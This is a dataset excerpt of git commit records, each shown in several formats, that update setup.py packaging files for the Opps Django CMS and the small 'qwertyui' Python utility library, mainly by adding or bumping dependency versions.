"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
Add new libs python on install requires Opps CMS#!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| <commit_before>#!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
<commit_msg>Add new libs python on install requires Opps CMS<commit_after>#!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
|
47903d4e8ff4e2adfc9a05b8145923154d7ff57e | setup.py | setup.py | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
| #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
| Update package versions, bump to 1.0.22 | Update package versions, bump to 1.0.22
| Python | mit | CGenie/qwertyui | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
Update package versions, bump to 1.0.22 | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
| <commit_before>#!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
<commit_msg>Update package versions, bump to 1.0.22<commit_after> | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
| #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
Update package versions, bump to 1.0.22#!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
| <commit_before>#!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
<commit_msg>Update package versions, bump to 1.0.22<commit_after>#!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.